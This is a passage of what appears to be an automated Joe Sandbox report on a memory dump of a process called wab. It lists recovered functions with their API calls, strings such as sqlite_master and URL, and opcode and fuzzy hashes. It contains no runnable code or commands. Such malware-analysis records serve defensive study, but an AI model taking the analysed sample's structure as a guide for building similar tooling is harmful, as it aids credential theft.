                                • Opcode Fuzzy Hash: 871df5fef43ba47fad24df649b94f0d233f9868d8bda670e26c25dba733484ff
                                • Instruction Fuzzy Hash: 65115EF2A003057FDB349E15D980C9A77A8EF50394B00062FF90AD6151E7B8DEA5C7D9
                                APIs
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: ??2@??3@memcpymemset
                                • String ID:
                                • API String ID: 1865533344-0
                                • Opcode ID: 63ad74f41b12567b58218fea097aeaefd91ee3ffeae00ec4d641ec9fdbd265cd
                                • Instruction ID: b60eca7fe842e91d7951f76ed0837c2ba419520120b0ca9395dcc9976308fc09
                                • Opcode Fuzzy Hash: 63ad74f41b12567b58218fea097aeaefd91ee3ffeae00ec4d641ec9fdbd265cd
                                • Instruction Fuzzy Hash: C7118C71204701AFD328DF2DC881A27F7E9EF99300B21892EE49AC7385DA35E811CB55
                                APIs
                                • strlen.MSVCRT ref: 0040B0D8
                                • ??3@YAXPAX@Z.MSVCRT ref: 0040B0FB
                                  • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                  • Part of subcall function 004099F4: memcpy.MSVCRT ref: 00409A28
                                  • Part of subcall function 004099F4: ??3@YAXPAX@Z.MSVCRT ref: 00409A31
                                • ??3@YAXPAX@Z.MSVCRT ref: 0040B12C
                                • memcpy.MSVCRT ref: 0040B159
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: ??3@$memcpy$mallocstrlen
                                • String ID:
                                • API String ID: 1171893557-0
                                • Opcode ID: 1049280fa2475c497c1b628b605c6dc2082e028c9e0fefa85919baabf6481477
                                • Instruction ID: 61abf4b4d63bdfee40e3433ef4540d9b033b11d4199be086b3082c0bee804e2f
                                • Opcode Fuzzy Hash: 1049280fa2475c497c1b628b605c6dc2082e028c9e0fefa85919baabf6481477
                                • Instruction Fuzzy Hash: CA113A712042019FD711DB98FC499267B66EB8733AB25833BF4045A2A3CBB99834865F
                                APIs
                                • memset.MSVCRT ref: 004144E7
                                  • Part of subcall function 0040A353: _snwprintf.MSVCRT ref: 0040A398
                                  • Part of subcall function 0040A353: memcpy.MSVCRT ref: 0040A3A8
                                • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 00414510
                                • memset.MSVCRT ref: 0041451A
                                • GetPrivateProfileStringW.KERNEL32(?,?,0044E518,?,00002000,?), ref: 0041453C
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: PrivateProfileStringmemset$Write_snwprintfmemcpy
                                • String ID:
                                • API String ID: 1127616056-0
                                • Opcode ID: 02b9e3d0e0b7074fd9b2be70e01a8c10e85f5fbe64ebb4837650a41ca567b1c2
                                • Instruction ID: e03fcf36bb778615f94f946172f2cadce4c7e53e7889dedf6030812535802df7
                                • Opcode Fuzzy Hash: 02b9e3d0e0b7074fd9b2be70e01a8c10e85f5fbe64ebb4837650a41ca567b1c2
                                • Instruction Fuzzy Hash: 9A1170B1500119BFEF115F65EC02EDA7B69EF04714F100066FB09B2060E6319A60DB9D
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: memcpy$memset
                                • String ID: sqlite_master
                                • API String ID: 438689982-3163232059
                                • Opcode ID: ce75bbd10503082b7a64f0374325e472d1c426e795aaa729e5fb1d324fd651cc
                                • Instruction ID: 9056235088afc86d32383ab843763c359d37acea7f1aa245e41bfa901f9896ac
                                • Opcode Fuzzy Hash: ce75bbd10503082b7a64f0374325e472d1c426e795aaa729e5fb1d324fd651cc
                                • Instruction Fuzzy Hash: 9401C872D006047BDB11AFB19C42FDEBB7CEF05318F51452BFA0461182E73A97248795
                                APIs
                                • SHGetMalloc.SHELL32(?), ref: 00414D9A
                                • SHBrowseForFolderW.SHELL32(?), ref: 00414DCC
                                • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00414DE0
                                • wcscpy.MSVCRT ref: 00414DF3
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: BrowseFolderFromListMallocPathwcscpy
                                • String ID:
                                • API String ID: 3917621476-0
                                • Opcode ID: d90d9ac40998c7a3314b3e96da16ed6310d1c669f25a0de425d8610d706a6174
                                • Instruction ID: 3f0f02420fde520a26c7535fd1ed00e0b1d7e8cc8ebd586967f5863715f62e8c
                                • Opcode Fuzzy Hash: d90d9ac40998c7a3314b3e96da16ed6310d1c669f25a0de425d8610d706a6174
                                • Instruction Fuzzy Hash: 3311FAB5A00208AFDB10DFA9D9889EEB7F8FB49314F10446AF905E7200D739DB45CB64
                                APIs
                                  • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                  • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                  • Part of subcall function 0040D134: memcpy.MSVCRT ref: 0040D24C
                                • _snwprintf.MSVCRT ref: 00410FE1
                                • SendMessageW.USER32(?,0000040B,00000000,?), ref: 00411046
                                  • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                  • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                  • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                • _snwprintf.MSVCRT ref: 0041100C
                                • wcscat.MSVCRT ref: 0041101F
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: HandleModule_snwprintf$LoadMessageSendStringmemcpywcscatwcscpywcslen
                                • String ID:
                                • API String ID: 822687973-0
                                • Opcode ID: 31feba04f8ec477b70d9d9ccd2954727a7d962f108a96a42e882c3f5707c4d5c
                                • Instruction ID: a8ddfa12325215ca31dcaa8c3ea10779747deab4b932dc2622e692dd88e5739d
                                • Opcode Fuzzy Hash: 31feba04f8ec477b70d9d9ccd2954727a7d962f108a96a42e882c3f5707c4d5c
                                • Instruction Fuzzy Hash: DC0184B59003056AF730E765DC86FAB73ACAB44708F04047AB319F6183DA79A9454A6D
                                APIs
                                • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,7622DF80,?,0041755F,?), ref: 00417452
                                • malloc.MSVCRT ref: 00417459
                                • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,?,00000000,00000000,?,7622DF80,?,0041755F,?), ref: 00417478
                                • ??3@YAXPAX@Z.MSVCRT ref: 0041747F
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: ByteCharMultiWide$??3@malloc
                                • String ID:
                                • API String ID: 4284152360-0
                                • Opcode ID: 393c83f8647a4e4e905b151b9ea1406947fc62e9018515f0e7f821d7fee9a8df
                                • Instruction ID: 8389f0226c663b3c6d8c6253af8546a3d73aba679155ae8f7c82d0c1376384d0
                                • Opcode Fuzzy Hash: 393c83f8647a4e4e905b151b9ea1406947fc62e9018515f0e7f821d7fee9a8df
                                • Instruction Fuzzy Hash: 1DF0E9B620D21E3F7B006AB55CC0C7B7B9CD7862FCB11072FF51091180E9594C1116B6
                                APIs
                                • GetModuleHandleW.KERNEL32(00000000), ref: 00412403
                                • RegisterClassW.USER32(?), ref: 00412428
                                • GetModuleHandleW.KERNEL32(00000000), ref: 0041242F
                                • CreateWindowExW.USER32(00000000,00000000,0044E518,00CF0000,00000000,00000000,00000280,000001E0,00000000,00000000,00000000), ref: 00412455
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: HandleModule$ClassCreateRegisterWindow
                                • String ID:
                                • API String ID: 2678498856-0
                                • Opcode ID: ffa2941c40dc3e4da5dfeb6f60aef2ef72cf6d205e20c7803454451710b81cbd
                                • Instruction ID: 2742b6e08e64d4f702ac0bdc031c2178a10537c5a2141806c9029dd5a11ba4c1
                                • Opcode Fuzzy Hash: ffa2941c40dc3e4da5dfeb6f60aef2ef72cf6d205e20c7803454451710b81cbd
                                • Instruction Fuzzy Hash: E601E5B1941228ABD7119FA68C89ADFBEBCFF09B14F10411AF514A2240D7B456408BE9
                                APIs
                                • GetDlgItem.USER32(?,?), ref: 00409B40
                                • SendMessageW.USER32(00000000,00000146,00000000,00000000), ref: 00409B58
                                • SendMessageW.USER32(00000000,00000150,00000000,00000000), ref: 00409B6E
                                • SendMessageW.USER32(00000000,0000014E,00000000,00000000), ref: 00409B91
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: MessageSend$Item
                                • String ID:
                                • API String ID: 3888421826-0
                                • Opcode ID: cb9c6f71d59db109bdd11c185378715e2458b2dfdf7aafdda88e0268854c6760
                                • Instruction ID: c5475329a145d4377f6ebcab718370c73cf4573fffc80ea9acc016878d8bcf0e
                                • Opcode Fuzzy Hash: cb9c6f71d59db109bdd11c185378715e2458b2dfdf7aafdda88e0268854c6760
                                • Instruction Fuzzy Hash: 89F01D75A0010CBFEB019F959CC1CAF7BBDFB497A4B204475F504E2150D274AE41AA64
                                APIs
                                • memset.MSVCRT ref: 00417B7B
                                • UnlockFileEx.KERNEL32(?,00000000,?,00000000,?), ref: 00417B9B
                                • LockFileEx.KERNEL32(?,00000001,00000000,?,00000000,?), ref: 00417BA7
                                • GetLastError.KERNEL32 ref: 00417BB5
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: File$ErrorLastLockUnlockmemset
                                • String ID:
                                • API String ID: 3727323765-0
                                • Opcode ID: 8dd354450774e38097dcb59a2dc1954613c626237ffe04feccb939eb681cbc84
                                • Instruction ID: 0282759007fe27108f915f617c318df1b7667033481b7feabffed058191037b6
                                • Opcode Fuzzy Hash: 8dd354450774e38097dcb59a2dc1954613c626237ffe04feccb939eb681cbc84
                                • Instruction Fuzzy Hash: A801F971108208BFDB219FA5DC84D9B77B8FB40308F20483AF51395050D730A944CB65
                                APIs
                                • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,00417D63,?,?,00417D63,00418178,00000000,?,004183E5,?,00000000), ref: 004173FF
                                • malloc.MSVCRT ref: 00417407
                                • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,?,00417D63,00418178,00000000,?,004183E5,?,00000000,00000000,?), ref: 0041741E
                                • ??3@YAXPAX@Z.MSVCRT ref: 00417425
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: ByteCharMultiWide$??3@malloc
                                • String ID:
                                • API String ID: 4284152360-0
                                • Opcode ID: c62e76641e050cafa551b594d013d2ba0ec055e9779dbb9c6b02089c0e2d57f7
                                • Instruction ID: cad4d062c051d68cf548c6c9b5623cfc012c7edadb1d539185634ca375d1558c
                                • Opcode Fuzzy Hash: c62e76641e050cafa551b594d013d2ba0ec055e9779dbb9c6b02089c0e2d57f7
                                • Instruction Fuzzy Hash: E7F0377620921E7BDA1029655C40D77779CEB8B675B11072BBA10D21C1ED59D81005B5
                                APIs
                                • memset.MSVCRT ref: 0040F673
                                • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00007FFF,00000000,00000000,?,<item>), ref: 0040F690
                                • strlen.MSVCRT ref: 0040F6A2
                                • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040F6B3
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: ByteCharFileMultiWideWritememsetstrlen
                                • String ID:
                                • API String ID: 2754987064-0
                                • Opcode ID: 3f0454cb73c2afb10a3316e2dc28fa1dd1c693e32e23138b57773469a51e87f3
                                • Instruction ID: e5447571fde1e0de43d26e7f5909b1ba013d3ab3fbf9ce0dfcc5e01eb4e41d37
                                • Opcode Fuzzy Hash: 3f0454cb73c2afb10a3316e2dc28fa1dd1c693e32e23138b57773469a51e87f3
                                • Instruction Fuzzy Hash: 03F062B680102C7FEB81A794DC81DEB77ACEB05258F0080B2B715D2140E9749F484F7D
                                APIs
                                • memset.MSVCRT ref: 0040F6E2
                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00001FFF,00000000,00000000,?,<item>), ref: 0040F6FB
                                • strlen.MSVCRT ref: 0040F70D
                                • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040F71E
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: ByteCharFileMultiWideWritememsetstrlen
                                • String ID:
                                • API String ID: 2754987064-0
                                • Opcode ID: 7e04724105a3fa4aadef5922e8bb643722353f9661974f919d975e4a71db6ff5
                                • Instruction ID: 4069f22fd96ae38f7b0fbed24adb75974e75abfa9f51d26af0f678a77882025e
                                • Opcode Fuzzy Hash: 7e04724105a3fa4aadef5922e8bb643722353f9661974f919d975e4a71db6ff5
                                • Instruction Fuzzy Hash: C8F06DB780022CBFFB059B94DCC8DEB77ACEB05254F0000A2B715D2042E6749F448BB8
                                APIs
                                • memset.MSVCRT ref: 00402FD7
                                • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00001FFF,00000000,00000000), ref: 00402FF4
                                • strlen.MSVCRT ref: 00403006
                                • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00403017
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: ByteCharFileMultiWideWritememsetstrlen
                                • String ID:
                                • API String ID: 2754987064-0
                                • Opcode ID: 49e580325b1ac44ac77cea4f14661dbded7e9a4fc7592e14ed5ffb05533c48ce
                                • Instruction ID: 6e06d661e179051d6303c1013900a6e5c00fd457a34177cb37a2705ba00c9068
                                • Opcode Fuzzy Hash: 49e580325b1ac44ac77cea4f14661dbded7e9a4fc7592e14ed5ffb05533c48ce
                                • Instruction Fuzzy Hash: 01F049B680122CBEFB05AB949CC9DEB77ACEB05254F0000A2B715D2082E6749F448BA9
                                APIs
                                  • Part of subcall function 00409D7F: memset.MSVCRT ref: 00409D9E
                                  • Part of subcall function 00409D7F: GetClassNameW.USER32(?,00000000,000000FF), ref: 00409DB5
                                  • Part of subcall function 00409D7F: _wcsicmp.MSVCRT ref: 00409DC7
                                • SetBkMode.GDI32(?,00000001), ref: 004143A2
                                • SetBkColor.GDI32(?,00FFFFFF), ref: 004143B0
                                • SetTextColor.GDI32(?,00C00000), ref: 004143BE
                                • GetStockObject.GDI32(00000000), ref: 004143C6
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: Color$ClassModeNameObjectStockText_wcsicmpmemset
                                • String ID:
                                • API String ID: 764393265-0
                                • Opcode ID: 511a8a1029f4fd91347c0110e60971c3c9d55721028eb227f3be943e95f629a7
                                • Instruction ID: 55a1794077c12dabf0ba6e1c8d3319674f3f2ba5a0574a39bcd6537ad23d1771
                                • Opcode Fuzzy Hash: 511a8a1029f4fd91347c0110e60971c3c9d55721028eb227f3be943e95f629a7
                                • Instruction Fuzzy Hash: 3AF06835200219BBCF112FA5EC06EDD3F25BF05321F104536FA25A45F1CBB59D609759
                                APIs
                                • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A76D
                                • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?,?,?), ref: 0040A77D
                                • SystemTimeToFileTime.KERNEL32(?,?,?,?), ref: 0040A78C
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: Time$System$File$LocalSpecific
                                • String ID:
                                • API String ID: 979780441-0
                                • Opcode ID: e6f681992166f7eacb6a90eac37249c69a118d36aeffaac3dc06015c0a75a69a
                                • Instruction ID: f583aad53f3de4022dcae7e9f33737e8013f67213d7447df07319dea818b2b95
                                • Opcode Fuzzy Hash: e6f681992166f7eacb6a90eac37249c69a118d36aeffaac3dc06015c0a75a69a
                                • Instruction Fuzzy Hash: 48F08272900219AFEB019BB1DC49FBBB3FCBB0570AF04443AE112E1090D774D0058B65
                                APIs
                                • memcpy.MSVCRT ref: 004134E0
                                • memcpy.MSVCRT ref: 004134F2
                                • GetModuleHandleW.KERNEL32(00000000), ref: 00413505
                                • DialogBoxParamW.USER32(00000000,0000006B,?,Function_000131DC,00000000), ref: 00413519
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: memcpy$DialogHandleModuleParam
                                • String ID:
                                • API String ID: 1386444988-0
                                • Opcode ID: d55c8f406ca3c44be23ebae39d0952233c85391216aaf70b52daa0aa76105663
                                • Instruction ID: 364e94b7bdcda47f4d7f1f8d7aeee0d56301a77e6e21c3ce81869cca2c347424
                                • Opcode Fuzzy Hash: d55c8f406ca3c44be23ebae39d0952233c85391216aaf70b52daa0aa76105663
                                • Instruction Fuzzy Hash: 80F0E272A843207BF7207FA5AC0AB477E94FB05B03F114826F600E50D2C2B988518F8D
                                APIs
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: ??3@
                                • String ID:
                                • API String ID: 613200358-0
                                • Opcode ID: 51118905c2728d810469e0c59db0571482045495d4d228400e43909190034b47
                                • Instruction ID: aa45652f999bbb0892b85dcd7393972dd4dfe4e89c7b59a5f1a68188070d07e1
                                • Opcode Fuzzy Hash: 51118905c2728d810469e0c59db0571482045495d4d228400e43909190034b47
                                • Instruction Fuzzy Hash: 5EE08C60F0830052BA31EBBABD40E2723EC5E1AB4271A842FB905C3282CE2CC880C02D
                                APIs
                                • SendMessageW.USER32(?,00000010,00000000,00000000), ref: 00411D71
                                • InvalidateRect.USER32(?,00000000,00000000), ref: 00411DC1
                                Strings
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: InvalidateMessageRectSend
                                • String ID: d=E
                                • API String ID: 909852535-3703654223
                                • Opcode ID: d50188de171b89ef93dcf19ee585c83eb13d29586f1846fcb2bff02c85403588
                                • Instruction ID: 9534a32422cce1c6391a187da628b0196a645ea69cbd0f5c6bc65931d7846800
                                • Opcode Fuzzy Hash: d50188de171b89ef93dcf19ee585c83eb13d29586f1846fcb2bff02c85403588
                                • Instruction Fuzzy Hash: 7E61E9307006044BDB20EB658885FEE73E6AF44728F42456BF2195B2B2CB79ADC6C74D
                                APIs
                                • wcschr.MSVCRT ref: 0040F79E
                                • wcschr.MSVCRT ref: 0040F7AC
                                  • Part of subcall function 0040AA8C: wcslen.MSVCRT ref: 0040AAA8
                                  • Part of subcall function 0040AA8C: memcpy.MSVCRT ref: 0040AACB
                                Strings
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: wcschr$memcpywcslen
                                • String ID: "
                                • API String ID: 1983396471-123907689
                                • Opcode ID: a49a7bca3fdcf7d664bb1a19bbfdf9ac20233bdad490a911e177b035a317b33a
                                • Instruction ID: b5ec2b97dc3a1d34b4ae52474db4a85f3d32b900c8044ec90cdce640e07fed14
                                • Opcode Fuzzy Hash: a49a7bca3fdcf7d664bb1a19bbfdf9ac20233bdad490a911e177b035a317b33a
                                • Instruction Fuzzy Hash: 7C315532904204ABDF24EFA6C8419EEB7B4EF44324F20457BEC10B75D1DB789A46CE99
                                APIs
                                  • Part of subcall function 0040A32D: SetFilePointer.KERNEL32(0040C2BF,?,00000000,00000000,?,0040C0C5,00000000,00000000,?,00000020,?,0040C255,?,?,*.*,0040C2BF), ref: 0040A33A
                                • _memicmp.MSVCRT ref: 0040C00D
                                • memcpy.MSVCRT ref: 0040C024
                                Strings
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: FilePointer_memicmpmemcpy
                                • String ID: URL
                                • API String ID: 2108176848-3574463123
                                • Opcode ID: 0ffae9aaa7e8776105f4b8355cfdff3a17deb021c318058ed5e09a60dc4caa80
                                • Instruction ID: e2f67ed442a0be3002cd5c838a3b557e7d557c6bd05ddcbc6cfa09d4dad31ce1
                                • Opcode Fuzzy Hash: 0ffae9aaa7e8776105f4b8355cfdff3a17deb021c318058ed5e09a60dc4caa80
                                • Instruction Fuzzy Hash: 03110271600204FBEB11DFA9CC45F5B7BA9EF41388F004166F904AB291EB79DE10C7A9
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: _snwprintfmemcpy
                                • String ID: %2.2X
                                • API String ID: 2789212964-323797159
                                • Opcode ID: 565383a1db30c24bbe212324ccaa161bb2139c15501903e42e5a35b00c7b7038
                                • Instruction ID: 802357eb4f50a043e47c8b78e7782d62930b20b04af67ea92e1f933aeb07fc5a
                                • Opcode Fuzzy Hash: 565383a1db30c24bbe212324ccaa161bb2139c15501903e42e5a35b00c7b7038
                                • Instruction Fuzzy Hash: 71118E32900309BFEB10DFE8D8829AFB3B9FB05314F108476ED11E7141D6789A258B96
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: _snwprintf
                                • String ID: %%-%d.%ds
                                • API String ID: 3988819677-2008345750
                                • Opcode ID: ff7c17540168d96ed4966b56b0a467b3337874ab214ea8a90bdbbe2252cfc3dc
                                • Instruction ID: 7541af853baca77dfc804340e5f0ab0fe899c5989b891af63cf45e557cb41de3
                                • Opcode Fuzzy Hash: ff7c17540168d96ed4966b56b0a467b3337874ab214ea8a90bdbbe2252cfc3dc
                                • Instruction Fuzzy Hash: B801DE71200204BFD720EE59CC82D5AB7E8FB48308B00443AF846A7692D636E854CB65
                                APIs
                                • memset.MSVCRT ref: 0040E770
                                • SendMessageW.USER32(F^@,0000105F,00000000,?), ref: 0040E79F
                                Strings
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: MessageSendmemset
                                • String ID: F^@
                                • API String ID: 568519121-3652327722
                                • Opcode ID: f8314852293f46423bc2a010faad31e0b7cb282108ef47112cad279f3d3f551f
                                • Instruction ID: 5049a961280a3e8282645b70ff0f7bf8ff78c54eb6baa8beabb6daf17925e322
                                • Opcode Fuzzy Hash: f8314852293f46423bc2a010faad31e0b7cb282108ef47112cad279f3d3f551f
                                • Instruction Fuzzy Hash: A701A239900204ABEB209F5ACC81EABB7F8FF44B45F008429E854A7291D3349855CF79
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: PlacementWindowmemset
                                • String ID: WinPos
                                • API String ID: 4036792311-2823255486
                                • Opcode ID: 43a26fe09d4836415a0f9153b5f51c370111d8f5fda2234af2192006d5bb601b
                                • Instruction ID: 942d740d8c3c01bede0812328a3a4706cce13fdf2e849e9dfea5930b7654417c
                                • Opcode Fuzzy Hash: 43a26fe09d4836415a0f9153b5f51c370111d8f5fda2234af2192006d5bb601b
                                • Instruction Fuzzy Hash: D4F096B0600204EFEB04DF55D899F6A33E8EF04701F1440B9F909DB1D1E7B89A04C729
                                APIs
                                  • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                                • wcsrchr.MSVCRT ref: 0040DCE9
                                • wcscat.MSVCRT ref: 0040DCFF
                                Strings
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: FileModuleNamewcscatwcsrchr
                                • String ID: _lng.ini
                                • API String ID: 383090722-1948609170
                                • Opcode ID: d415c57d84eb2c5e7c8364d47a353e5cf76fbd17fa45f1fd58641194e3ec22f3
                                • Instruction ID: 003e7a9acac466aac22365d7a2b75ab102816a5e64793edac74c8fca87dba5cc
                                • Opcode Fuzzy Hash: d415c57d84eb2c5e7c8364d47a353e5cf76fbd17fa45f1fd58641194e3ec22f3
                                • Instruction Fuzzy Hash: CEC0129654561430F51526116C03B4E12585F13316F21006BFD01340C3EFAD5705406F
                                APIs
                                  • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                  • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                  • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                  • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                  • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                  • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                • GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 00414BA4
                                Strings
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: LibraryLoad$AddressDirectoryProcSystemmemsetwcscatwcscpy
                                • String ID: SHGetSpecialFolderPathW$shell32.dll
                                • API String ID: 2773794195-880857682
